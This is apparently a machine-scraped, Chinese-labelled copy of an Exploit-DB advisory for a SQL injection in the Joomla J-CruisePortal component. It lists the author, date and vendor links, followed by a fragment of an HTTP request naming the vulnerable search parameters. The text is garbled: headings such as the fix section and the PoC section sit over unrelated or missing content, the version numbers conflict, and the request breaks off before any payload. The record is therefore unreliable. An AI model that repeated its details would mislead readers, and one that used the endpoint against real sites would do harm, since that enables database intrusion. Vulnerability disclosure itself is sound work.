Joomla! Component J-CruisePortal 6.0.4 - SQL Injection 漏洞概述 EDB-ID: 46233 Author: Ihsan Sencan Type: WEBAPPS Platform: PHP Date: 2019-01-24 EDB Verified: 是 Vulnerable App: Joomla! Component J-CruisePortal 6.0.4 影响范围 Vendor Homepage: http://cmsjunkie.com/ Software Link: https://www.cmsjunkie.com/joomla-cruise-reservation-portal Version: 6.0.7 Category: Webapps Tested on: WIN7 x64/KaliLinux x64 CVE: N/A 修复方案 Upgrade-Insecure-Requests: 1 **controller=search&task=searchcruises&year_start=2019&month_start=0&day_start=23&year_end=2019&month_end=0&cruise_id=6&day_end=6&quest=558&b50=2&room_guests=children%5B%5D0=&keyword=&cruisereservation_datae=01%2F23%2F2019&cruisereservation_datee=01%2F24%2F2019&cruisereservation_undefined POC代码